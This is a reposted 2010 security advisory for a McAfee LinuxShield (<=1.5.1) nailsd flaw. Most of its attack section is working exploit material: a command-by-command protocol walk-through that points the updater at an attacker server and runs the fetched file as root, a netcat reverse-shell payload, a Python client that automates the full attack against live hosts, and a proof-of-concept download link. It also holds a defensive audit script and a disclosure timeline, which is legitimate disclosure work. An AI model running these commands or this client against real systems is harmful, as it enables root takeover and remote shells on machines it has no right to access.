McAfee LinuxShield local/remote code execution vulnerability

Source: sitedir

Details

McAfee LinuxShield remote/local code execution
Affected versions: McAfee LinuxShield <= 1.5.1
Remote exploitation: Yes
Local exploitation: Yes
Background:
===========


LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine, the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed, a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)



Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability, but the attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
"nailsd" daemon, which listens on port 65443/tcp, to change and query
the configuration and to execute tasks.

Any user who can log in to the victim host can also authenticate to
"nailsd" and can then change the configuration and execute tasks with
root privileges. For a local user this is privilege escalation to
root; for a remote attacker who holds any system account's
credentials it is remote code execution.

nailsd offers no direct way to run commands, but code can be
downloaded and executed by manipulating the configuration and running
LinuxShield's scheduled tasks.


walk-through (after the TLS handshake):
+--------------------------------------

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Point the update repository at an attacker-controlled HTTP server
# that serves our payload as catalog.z. The command is sent as one
# line; it is wrapped here for readability.
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?>
          <ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110"
          LocalVersion="20091209161903" Type="Client">
          <SiteList Default="1" Name="SomeGUID">
          <HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80"
          Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth>
          <UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists>
          _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a scan profile that executes our code. Profiles are not
# stored in the database but in /var/opt/NAI/LinuxShield/etc/ods.cfg.
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set "nailsd.profile.ODS_99.scannerPath" to the path where the
# catalog.z fetched by the update task is stored
# (/opt/McAfee/cma/scratch/update/catalog.z). The handle returned by
# "sconf ODS_99 begin" (1260400888) is reused for set and commit. The
# command is sent as one line; it is wrapped here, one setting per
# line, for readability.
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888
          nailsd.profile.ODS_99.allFiles=true
          nailsd.profile.ODS_99.childInitTmo=60
          nailsd.profile.ODS_99.cleanChildren=2
          nailsd.profile.ODS_99.cleansPerChild=10000
          nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
          nailsd.profile.ODS_99.decompArchive=true
          nailsd.profile.ODS_99.decompExe=true
          nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
          nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
          nailsd.profile.ODS_99.factoryInitTmo=60
          nailsd.profile.ODS_99.heuristicAnalysis=true
          nailsd.profile.ODS_99.macroAnalysis=true
          nailsd.profile.ODS_99.maxQueSize=32
          nailsd.profile.ODS_99.mime=true
          nailsd.profile.ODS_99.noJokes=false
          nailsd.profile.ODS_99.program=true
          nailsd.profile.ODS_99.quarantineChildren=1
          nailsd.profile.ODS_99.quarantineDirectory=/quarantine
          nailsd.profile.ODS_99.quarantinesPerChild=10000
          nailsd.profile.ODS_99.scanChildren=2
          nailsd.profile.ODS_99.scanMaxTmo=301
          nailsd.profile.ODS_99.scanNWFiles=true
          nailsd.profile.ODS_99.scanOnRead=true
          nailsd.profile.ODS_99.scanOnWrite=true
          nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
          nailsd.profile.ODS_99.scansPerChild=10000
          nailsd.profile.ODS_99.slowScanChildren=0
          nailsd.profile.ODS_99.filter.0.type=exclude-path
          nailsd.profile.ODS_99.filter.0.path=/proc
          nailsd.profile.ODS_99.filter.0.subdir=true
          nailsd.profile.ODS_99.filter.extensions.mode=all
          nailsd.profile.ODS_99.filter.extensions.type=extension
          nailsd.profile.ODS_99.action.Default.primary=Clean
          nailsd.profile.ODS_99.action.Default.secondary=Quarantine
          nailsd.profile.ODS_99.action.App.primary=Clean
          nailsd.profile.ODS_99.action.App.secondary=Quarantine
          nailsd.profile.ODS_99.action.timeout=Pass
          nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Schedule a scan task that uses the manipulated profile (one line on
# the wire, wrapped here)
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand
          taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false
          timetable=type=unscheduled taskResults=0 i_lastRun=1260318482
          status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Start the scan task: the scan child loads scannerPath, i.e. our
# catalog.z, and runs it as root
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF


To get a reverse root shell, place something like this in catalog.z
(it is run by the scan child, which nailsd starts as root):

--- snip ---
#!/bin/sh
# needs a netcat build that supports -e; not every nc does
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---
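The walk-through above as a scripted client, an added example written for this page (it is not the advisory's PoC and not McAfee code). It sends the nine commands in the order shown, takes the transaction handle from the `sconf ... begin` reply, and can be dry-run offline through `ScriptedTransport`, which replays the replies the page shows; `TlsTransport` talks to a real daemon. Assumptions the page does not state: commands and replies are newline-terminated, failures start with "-ERR", and nailsd's certificate cannot be validated. The profile settings are the walk-through's; every key gets the `nailsd.profile.<name>.` prefix, so the stray `ODS_5` datPath in the transcript becomes `ODS_99` here.

```python
# Added example (not the advisory's PoC, not McAfee code): drive the nailsd
# line protocol from the walk-through against a lab install. Assumed, since
# the page does not say so: lines end in "\n", failures start with "-ERR",
# and the daemon's certificate cannot be validated (verification is off).
import socket
import ssl

NAILSD_PORT = 65443                                           # from the advisory
SCRATCH_CATALOG = "/opt/McAfee/cma/scratch/update/catalog.z"  # where the update task stores catalog.z


class NailsdError(RuntimeError):
    """nailsd answered with something other than +OK (e.g. a failed auth)."""


class NailsdSession:
    """Request/response driver over anything that has sendall() and readline()."""
    def __init__(self, transport):
        self.transport = transport

    def read_reply(self):
        line = self.transport.readline()
        if not line:
            raise NailsdError("connection closed by nailsd")
        reply = line.decode("utf-8", "replace").rstrip("\r\n")
        if not reply.startswith("+OK"):
            raise NailsdError(reply)
        return reply

    def command(self, cmd):
        self.transport.sendall(cmd.encode() + b"\n")
        return self.read_reply()


class ScriptedTransport:
    """Offline stand-in for the socket: replays canned replies, records what was sent."""
    def __init__(self, replies):
        self.replies, self.sent = [r.encode() + b"\n" for r in replies], []

    def sendall(self, data):
        self.sent.append(data.decode().rstrip("\n"))

    def readline(self):
        return self.replies.pop(0) if self.replies else b""


class TlsTransport:
    """The real transport: TLS to nailsd, read line by line (lab use only)."""
    def __init__(self, host="127.0.0.1", port=NAILSD_PORT):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE  # assumption: self-signed cert
        self.tls = ctx.wrap_socket(socket.create_connection((host, port)))
        self.reader = self.tls.makefile("rb")

    def sendall(self, data):
        self.tls.sendall(data)

    def readline(self):
        return self.reader.readline()


def sitelist_xml(attacker_host, relative_path="nai"):
    """Repository SiteList from the walk-through: the updater will fetch
    http://<attacker_host>/<relative_path>/catalog.z."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" '
        'LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID">'
        f'<HttpSite Type="repository" Name="EvilRepo" Order="1" Server="{attacker_host}:80" '
        f'Enabled="1" Local="1"><RelativePath>{relative_path}</RelativePath><UseAuth>0</UseAuth>'
        '<UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists>'
    )


# Settings from the walk-through's "sconf ODS_99 set"; each key gets the
# nailsd.profile.<name>. prefix, {payload} becomes the scannerPath value.
PROFILE_KEYS = """
allFiles=true childInitTmo=60 cleanChildren=2 cleansPerChild=10000
datPath=/opt/NAI/LinuxShield/engine/dat decompArchive=true decompExe=true
engineLibDir=/opt/NAI/LinuxShield/engine/lib enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
factoryInitTmo=60 heuristicAnalysis=true macroAnalysis=true maxQueSize=32 mime=true noJokes=false
program=true quarantineChildren=1 quarantineDirectory=/quarantine quarantinesPerChild=10000
scanChildren=2 scanMaxTmo=301 scanNWFiles=true scanOnRead=true scanOnWrite=true
scannerPath={payload} scansPerChild=10000 slowScanChildren=0
filter.0.type=exclude-path filter.0.path=/proc filter.0.subdir=true
filter.extensions.mode=all filter.extensions.type=extension
action.Default.primary=Clean action.Default.secondary=Quarantine action.App.primary=Clean
action.App.secondary=Quarantine action.timeout=Pass action.error=Block
"""


def profile_command(profile, handle, payload=SCRATCH_CATALOG):
    pairs = PROFILE_KEYS.format(payload=payload).split()
    return f"sconf {profile} set {handle} " + " ".join(f"nailsd.profile.{profile}.{kv}" for kv in pairs)


def run_walkthrough(session, user, password, attacker_host, profile="ODS_99",
                    task_name="Evil Task", scan_path="/root/tmp", payload=SCRATCH_CATALOG):
    """Send the walk-through's commands in order; returns every reply, banner first."""
    replies = [session.read_reply()]                      # +OK welcome to the NAILS Statistics Service
    send = lambda cmd: replies.append(session.command(cmd))
    send(f"auth {user} {password}")
    send(f"db set 1 _table=repository status=1 siteList={sitelist_xml(attacker_host)} _cmd=update")
    send("task setsitelist")
    send("task nstart LinuxShield Update")               # downloads catalog.z into the scratch dir
    send(f"sconf {profile} begin")
    parts = replies[-1].split()                           # "+OK 1260400888": the transaction handle
    if len(parts) < 2:
        raise NailsdError("no transaction handle in " + replies[-1])
    handle = parts[1]
    send(profile_command(profile, handle, payload))
    send(f"sconf {profile} commit {handle}")
    send(f"db set {handle} _table=schedule taskName={task_name} taskType=On-Demand "
         f"taskInfo=profileName={profile},paths=path:{scan_path};exclude:false "
         f"timetable=type=unscheduled taskResults=0 i_lastRun=0 status=Stopped _cmd=insert")
    send(f"task nstart {task_name}")                      # the scan child loads scannerPath as root
    return replies
```

Against a real host this is `run_walkthrough(NailsdSession(TlsTransport("victim")), user, password, "attackerhost")`, with the payload served at http://attackerhost/nai/catalog.z. The page shows no pause between the update task and the scan task; on a slow link let the download finish before the last command is sent.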



Proof of Concept :
==================

http://inj3ct0r.com/sploits/11165.tar.gz



Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007
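Beyond applying the vendor fix, a responder may want to check existing hosts for traces of the technique described above: a scan profile whose scannerPath (or engine/DAT path) points outside the LinuxShield install tree, in particular into the updater's scratch directory, or a catalog.z in that directory that is a shell script rather than a catalog. The following is an added example for this page, not McAfee tooling; it assumes ods.cfg consists of `nailsd.profile.<name>.<key>=<value>` lines like those `sconf ... set` sends (the real on-disk format may differ), and the benign ODS_1 profile in the constructed sample uses a placeholder scannerPath.

```python
# Added example (not McAfee tooling): look for traces of the technique above
# on a LinuxShield host. Assumed, since the page does not show it: ods.cfg
# holds one nailsd.profile.<name>.<key>=<value> per line, mirroring the pairs
# that "sconf ... set" sends; the benign ODS_1 scannerPath below is a placeholder.
import os
import re

ODS_CFG = "/var/opt/NAI/LinuxShield/etc/ods.cfg"      # scan profiles (from the walk-through)
INSTALL_PREFIX = "/opt/NAI/LinuxShield/"               # engine/DAT paths in the walk-through
SCRATCH_DIR = "/opt/McAfee/cma/scratch/"               # where the update task drops catalog.z
PROFILE_RE = re.compile(r"^nailsd\.profile\.([^.]+)\.(\S+?)=(.*)$")
PATH_KEYS = ("scannerPath", "enginePath", "engineLibDir", "datPath")


def parse_profiles(cfg_text):
    """Group profile lines into {profile: {key: value}}; other lines are ignored."""
    profiles = {}
    for line in cfg_text.splitlines():
        m = PROFILE_RE.match(line.strip())
        if m:
            profiles.setdefault(m.group(1), {})[m.group(2)] = m.group(3)
    return profiles


def audit_profiles(profiles, prefix=INSTALL_PREFIX):
    """Flag profiles whose scanner, engine or DAT path leaves the install prefix.
    The walk-through sets scannerPath to the updater's scratch copy of catalog.z,
    so that directory gets its own reason."""
    findings = []
    for name, keys in profiles.items():
        for key in PATH_KEYS:
            if key not in keys:
                continue
            norm = os.path.normpath(keys[key])            # defeats /opt/NAI/LinuxShield/../x
            if norm.startswith(SCRATCH_DIR):
                findings.append((name, key, keys[key], "points into the updater scratch directory"))
            elif not norm.startswith(prefix):
                findings.append((name, key, keys[key], "outside the LinuxShield install prefix"))
    return findings


def looks_like_script(head):
    """A shell-script catalog.z (as in the walk-through) starts with an interpreter line."""
    return head.startswith(b"#!")


def audit_host(cfg_path=ODS_CFG, catalog_path=SCRATCH_DIR + "update/catalog.z"):
    """Run both checks against the live host; returns (profile, key, value, reason) tuples."""
    findings = []
    if os.path.exists(cfg_path):
        with open(cfg_path, encoding="utf-8", errors="replace") as f:
            findings += audit_profiles(parse_profiles(f.read()))
    if os.path.exists(catalog_path):
        with open(catalog_path, "rb") as f:
            if looks_like_script(f.read(64)):
                findings.append(("-", "catalog.z", catalog_path, "is a script, not a catalog"))
    return findings


# Constructed sample: ODS_1 is a placeholder benign profile (its scannerPath is
# made up), ODS_99 carries the values the walk-through sets.
SAMPLE_CFG = """\
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/bin/scanner
nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_1.datPath=/opt/NAI/LinuxShield/engine/dat
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.datPath=/opt/NAI/LinuxShield/engine/dat
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_99.filter.0.path=/proc
"""

if __name__ == "__main__":
    for finding in audit_profiles(parse_profiles(SAMPLE_CFG)) + audit_host():
        print(*finding, sep="  ")
```

Run it as root on the host; the sample block reports ODS_99's scannerPath, and the live checks add anything found in the real ods.cfg and scratch directory. Because the schedule entry lives in nailsd's database rather than in a file, the "Evil Task" itself is not visible here; it has to be looked for through the web interface or the nailsd `db` commands.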



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent its PGP key
2010.02.05: Sent PoC, advisory, disclosure policy and planned disclosure
            date (2010.02.18) to vendor
2010.02.05: Vendor acknowledges receipt of the advisory
2010.02.16: Asked for a status update, since the planned release date
            was 2010.02.18
2010.02.16: Vendor responds that a patch is being worked on
2010.02.17: Changed release date to 2010.02.25
2010.02.22: Vendor gives a status update: the patch can be released on
            2010.02.25
2010.02.24: Asked for the list of affected products and the advisory URL
2010.02.24: Vendor sends the list
2010.03.02: Release of this advisory

Posted on sitedirsec.com: 2010-3-6

# 帖子标题 作者时间

作者贡献(sitedir/663)

# 漏洞标题 发布时间
1892 Adobe Connect 9.5.7 - Cross-Site Scripting 2016-11-1
1890 PHPCMS V9最新版本后台设计缺陷获取getshell 2016-9-20
1889 十二行代码让主流浏览器全线崩溃 2016-9-19
1888 Windows/x86 Password Protected TCP Bind Shell 2016-9-19
1884 逐浪cms 2.4任意文件上传漏洞 2015-12-1
1883 vBulletin 5 远程命令执行(无需登录) 2015-12-1
1882 Phpcmsv9 注入0day分析 2015-12-1
1881 pigcms多版本SQL注入漏洞 2015-12-1
1879 MySQL Error Based SQL Injection Using EXP 2015-8-25
1877 DedeCMS < 5.7-sp1 - 远程文件包含漏洞 2015-7-31

机会与挑战

招聘职位 简介

官方职能 联系方式 移动关注
漏洞投递 pow78781#sitedirsec.com
sitedirsec
求职招聘 job#sitedirsec.com
获取邀请码 notice#sitedirsec.com
官方公告 notice#sitedirsec.com
官方微博 http://t.qq.com/baiduDSB

最新漏洞

网友评论